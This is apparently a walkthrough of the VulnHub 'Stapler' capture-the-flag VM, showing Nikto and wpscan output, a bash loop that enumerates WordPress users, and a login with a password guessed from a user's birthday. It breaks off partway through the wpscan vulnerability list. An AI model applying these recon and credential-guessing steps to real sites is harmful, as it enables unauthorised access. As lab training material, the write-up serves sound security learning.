+ Start Time: 2018-03-22 09:35:51 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '10.0.133.27' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2018-03-22 09:37:40 (GMT0) (109 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto connected using https and found some interesting information.
There may be a user names "pam" (pam@red.localhost email given in SSL certificate). Given the quality of the information Pam provided when generating the servers SSL certificate its reasonable to assume she is non technical and may use a weak password.
Connecting to the server over http in a browser displays a holding page:
.. image:: ./images/stapler/Stapler_12380_holding_page.png
:alt: holding page
every page redirects to this holding page over http.
Examine page source
Title of the page:
.. code-block:: html
Tim, we need to-do better next year for Initech
There is likely a user named "tim" who appears to be responsible for web content/developing this website.
Comment in page source:
.. code-block:: html
Another possible user "zoe" is discovered who works in HR.
Robots.txt:
.. raw:: html
Visiting https://10.0.133.27:12380/admin112233/:
.. code-block:: html
root@kali:~/vulnhub/stapler# curl -k https://10.0.133.27:12380/admin112233/
mwwhahahah
More cookies :)
Visiting https://10.0.133.27:12380/blogblog/ (with noscript enabled):
.. image:: ./images/stapler/Stapler_12380_wp_index.png
:alt: wordpress website
Wordpress website content
^^^^^^^^^^^^^^^^^^^^^^^^^
"john smith" possible user account
.. code-block:: text
Written By John Smith
I run this place
Possibly a website admin or CEO?
The possible user "pam" that was previously discovered during the nikto scan appears to have recently had her birthday:
.. image:: ./images/stapler/Stapler_RSS_articles.png
:alt: Stapler_RSS_articles
using the RSS feed of the website Pams birthday can be guessed from the article's date as 20/05 ("Pam’s birthday which is today", article published date 20/05/2016). Working on the theory that pam is not a particularly technical (SSL cert details) and may use a simple password its worth trying as a password.
Nikto scan from wordpress website directory
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. raw:: html
root@kali:~/vulnhub/stapler# nikto -h https://10.0.133.27:12380/blogblog/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.0.133.27
+ Target Hostname: 10.0.133.27
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2018-04-01 22:56:59 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server leaks inodes via ETags, header found with file /blogblog/snrw2mso.xml , fields: 0x6a16a 0x53462974b46e8
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
+ Hostname '10.0.133.27' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /blogblog/readme.html: This WordPress file reveals the installed version.+ /blogblog/wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /blogblog/license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /blogblog/wp-login.php?action=register: Wordpress registration enabled+ OSVDB-3268: /blogblog/wp-content/uploads/: Directory indexing found.+ /blogblog/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information+ /blogblog/wp-login.php: Wordpress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2018-04-01 22:59:02 (GMT1) (123 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The wp-content directory has listing enabled allowing more information to be gathered about themes and plugins installed.
.. image:: ./images/stapler/Stapler_wp-content_listing.png
:alt: Stapler wp-content dir listing
Wordpress installed plugins:
.. image:: ./images/stapler/Stapler_wp-content_plugins_listing.png
:alt: Stapler wp-content plugins dir listing
Four plugins are discovered by traversing through the wp-content/plugins directory and the respective plugin folders:
- Advanced Video Embed v1.0
- Hello Dolly
- Shortcode-UI / Shortcake v0.4.0
- Two Factor
Advanced Video Embed v1.0 should be vulnerable to Local file Inclusion (LFI):
.. raw:: html
root@kali:~/vulnhub/stapler# searchsploit advanced video
--------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
WordPress Plugin AdvancedVideo 1.0 - Local File Inclusion | exploits/php/webapps/39646.py
--------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
``_.
The LFI exploit offers a promising way to gain credentials in a stealthy manor i.e. without resorting to brute force methods. The exploits source code requires modification to work which will be covered later.
Enumerating Wordpress users manually
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
https://10.0.133.27:12380/blogblog/?author=1
By brute forcing the wordpress user ID it is possible to enumerate WP user accounts
Bash one liner to brute force first 20 User ID's
for i in {1..20}; do \
curl -s -k https://10.0.133.27:12380/blogblog/?author=$i \
| grep "" | sed -e 's/<[^>]*>//g' | cut -f1 -d " "; done
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># for i in {1..20}; do \
> curl -s -k https://10.0.133.27:12380/blogblog/?author=$i \
> | grep "<title>" | sed -e 's/<[^>]*>//g' | cut -f1 -d " "; done
John
Elly
Peter
Barry
Heather
garry
harry
scott
kathy
tim
ZOE
Dave
Simon
Abby
Vicki
Pam
Page
Page
Page
Page
</pre>
UID's higher then 16 do not exist on the system and result in page not found errors.
Pam has a wordpress user account and we have a reasonable guess at her password, her birth date.
Login as pam with password 0520:
.. image:: ./images/stapler/Stapler_wp-admin_pam.png
:alt: Stapler wp-admin as pam
Pam appears to only have a user level account on the wordpress website so is unable to use admin features like the template editor which can be useful in obtaining Remote Code Execution (RCE). She also cannot moderate comments or publish articles.
Usernames were enumerated manually this way until it was realized that wpscan has a feature to do this builtin.
Scanning with wpscan
^^^^^^^^^^^^^^^^^^^^
wpscan, run with "--disable-tls-checks" to work around the self signed certificate in use on the server. --enumerate u[1-20] vp vt tt arguments were also given to wpscan to enumerate the first 20 UID's, vulnerable plugins, vulnerable themes and to test for a known vulnerability in the timthumb plugin. :
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># exitwpscan -u https://10.0.133.27:12380/blogblog/ --disable-tls-checks --enumerate u[1-20] vp vt tt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
<span class="green ">[+]</span> URL: https://10.0.133.27:12380/blogblog/
<span class="green ">[+]</span> Started: Thu Mar 29 18:02:06 2018
<span class="yellow ">[!]</span> The WordPress 'https://10.0.133.27:12380/blogblog/readme.html' file exists exposing a version number
<span class="green ">[+]</span> Interesting header: DAVE: Soemthing doesn't look right here
<span class="green ">[+]</span> Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
<span class="yellow ">[!]</span> Registration is enabled: https://10.0.133.27:12380/blogblog/wp-login.php?action=register
<span class="green ">[+]</span> XML-RPC Interface available under: https://10.0.133.27:12380/blogblog/xmlrpc.php
<span class="yellow ">[!]</span> Upload directory has directory listing enabled: https://10.0.133.27:12380/blogblog/wp-content/uploads/
<span class="yellow ">[!]</span> Includes directory has directory listing enabled: https://10.0.133.27:12380/blogblog/wp-includes/
<span class="green ">[+]</span> WordPress version 4.2.1 (Released on 2015-04-27) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
<span class="red ">[!]</span> 51 vulnerabilities identified from the version number
<span class="red ">[!]</span> Title: WordPress 4.1-4.2.1 - Unauthenticated Genericons Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7979
Reference: https://codex.wordpress.org/Version_4.2.2
<span class="blue ">[i]</span> Fixed in: 4.2.2
<span class="red ">[!]</span> Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8111
Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
Reference: https://twitter.com/klikkioy/status/624264122570526720
Reference: https://klikki.fi/adv/wordpress3.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
<span class="blue ">[i]</span> Fixed in: 4.2.3
<span class="red ">[!]</span> Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8126
Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
<span class="blue ">[i]</span> Fixed in: 4.2.4
<span class="red ">[!]</span> Title: WordPress <= 4.2.3 - Timing Side Channel Attack
Reference: https://wpvulndb.com/vulnerabilities/8130
Reference: https://core.trac.wordpress.org/changeset/33536
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
<span class="blue ">[i]</span> Fixed in: 4.2.4
<span class="red ">[!]</span> Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8131
Reference: https://core.trac.wordpress.org/changeset/33529
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
<span class="blue ">[i]</span> Fixed in: 4.2.4
<span class="red ">[!]</span> Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8132
Reference: https://core.trac.wordpress.org/changeset/33541
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
<span class="blue ">[i]</span> Fixed in: 4.2.4
<span class="red ">[!]</span> Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8133
Reference: https://core.trac.wordpress.org/changeset/33549
Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
<span class="blue ">[i]</span> Fixed in: 4.2.4
<span class="red ">[!]</span> Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8186
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
<span class="blue ">[i]</span> Fixed in: 4.2.5
<span class="red ">[!]</span> Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8187
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
<span class="blue ">[i]</span> Fixed in: 4.2.5
<span class="red ">[!]</span> Title: WordPress <= 4.3 - Publish Post & Mark as Sticky Permission Issue
Reference: https://wpvulndb.com/vulnerabilities/8188
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
<span class="blue ">[i]</span> Fixed in: 4.2.5
<span class="red ">[!]</span> Title: WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8358
Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
<span class="blue ">[i]</span> Fixed in: 4.2.6
<span class="red ">[!]</span> Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
Reference: https://wpvulndb.com/vulnerabilities/8376
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36435
Reference: https://hackerone.com/reports/110801
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
<span class="blue ">[i]</span> Fixed in: 4.2.7
<span class="red ">[!]</span> Title: WordPress 3.7-4.4.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8377
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36444
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
<span class="blue ">[i]</span> Fixed in: 4.2.7
<span class="red ">[!]</span> Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
Reference: https://wpvulndb.com/vulnerabilities/8473
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
<span class="blue ">[i]</span> Fixed in: 4.5
<span class="red ">[!]</span> Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
Reference: https://wpvulndb.com/vulnerabilities/8474
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
<span class="blue ">[i]</span> Fixed in: 4.5
<span class="red ">[!]</span> Title: WordPress <= 4.4.2 - Script Compression Option CSRF
Reference: https://wpvulndb.com/vulnerabilities/8475
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
<span class="blue ">[i]</span> Fixed in: 4.5
<span class="red ">[!]</span> Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8488
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
<span class="blue ">[i]</span> Fixed in: 4.5.2
<span class="red ">[!]</span> Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
Reference: https://wpvulndb.com/vulnerabilities/8489
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
Reference: http://avlidienbrunn.com/wp_some_loader.php
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
<span class="blue ">[i]</span> Fixed in: 4.2.8
<span class="red ">[!]</span> Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
Reference: https://wpvulndb.com/vulnerabilities/8518
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
<span class="blue ">[i]</span> Fixed in: 4.2.9
<span class="red ">[!]</span> Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/8519
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
<span class="blue ">[i]</span> Fixed in: 4.2.9
<span class="red ">[!]</span> Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
Reference: https://wpvulndb.com/vulnerabilities/8520
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
<span class="blue ">[i]</span> Fixed in: 4.2.9
<span class="red ">[!]</span> Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
Reference: https://wpvulndb.com/vulnerabilities/8615
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
Reference: http://seclists.org/fulldisclosure/2016/Sep/6
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
<span class="blue ">[i]</span> Fixed in: 4.2.10
<span class="red ">[!]</span> Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
Reference: https://wpvulndb.com/vulnerabilities/8616
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
<span class="blue ">[i]</span> Fixed in: 4.2.10
<span class="red ">[!]</span> Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
<span class="blue ">[i]</span> Fixed in: 4.2.11
<span class="red ">[!]</span> Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
Reference: https://www.mehmetince.net/low-severity-wordpress/
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
<span class="blue ">[i]</span> Fixed in: 4.2.11
<span class="red ">[!]</span> Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
Reference: https://wpvulndb.com/vulnerabilities/8719
Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
<span class="blue ">[i]</span> Fixed in: 4.2.11
<span class="red ">[!]</span> Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
Reference: https://wpvulndb.com/vulnerabilities/8720
Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
<span class="blue ">[i]</span> Fixed in: 4.2.11
<span class="red ">[!]</span> Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Reference: https://wpvulndb.com/vulnerabilities/8721
Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
<span class="blue ">[i]</span> Fixed in: 4.2.11
<span class="red ">[!]</span> Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
Reference: https://wpvulndb.com/vulnerabilities/8729
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
<span class="blue ">[i]</span> Fixed in: 4.2.12
<span class="red ">[!]</span> Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
<span class="blue ">[i]</span> Fixed in: 4.2.12
<span class="red ">[!]</span> Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
Reference: https://wpvulndb.com/vulnerabilities/8765
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
Reference: http://seclists.org/oss-sec/2017/q1/563
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
<span class="blue ">[i]</span> Fixed in: 4.2.13
<span class="red ">[!]</span> Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
Reference: https://wpvulndb.com/vulnerabilities/8766
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
<span class="blue ">[i]</span> Fixed in: 4.2.13
<span class="red ">[!]</span> Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
Reference: https://wpvulndb.com/vulnerabilities/8768
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
<span class="blue ">[i]</span> Fixed in: 4.2.13
<span class="red ">[!]</span> Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
Reference: https://wpvulndb.com/vulnerabilities/8770
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
Reference: http://seclists.org/oss-sec/2017/q1/562
Reference: https://hackerone.com/reports/153093
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
<span class="blue ">[i]</span> Fixed in: 4.2.13
<span class="red ">[!]</span> Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
Reference: https://core.trac.wordpress.org/ticket/25239
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
<span class="red ">[!]</span> Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
Reference: https://wpvulndb.com/vulnerabilities/8815
Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
<span class="blue ">[i]</span> Fixed in: 4.2.15
<span class="red ">[!]</span> Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
Reference: https://wpvulndb.com/vulnerabilities/8816
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
<span class="blue ">[i]</span> Fixed in: 4.2.15
<span class="red ">[!]</span> Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
Reference: https://wpvulndb.com/vulnerabilities/8817
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
<span class="blue ">[i]</span> Fixed in: 4.2.15
<span class="red ">[!]</span> Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
Reference: https://wpvulndb.com/vulnerabilities/8818
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
<span class="blue ">[i]</span> Fixed in: 4.2.15
<span class="red ">[!]</span> Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
Reference: https://wpvulndb.com/vulnerabilities/8819
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
Reference: https://hackerone.com/reports/203515
Reference: https://hackerone.com/reports/203515
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
<span class="blue ">[i]</span> Fixed in: 4.2.15
<span class="red ">[!]</span> Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
Reference: https://wpvulndb.com/vulnerabilities/8820
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
<span class="blue ">[i]</span> Fixed in: 4.2.15
<span class="red ">[!]</span> Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8905
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
<span class="blue ">[i]</span> Fixed in: 4.2.16
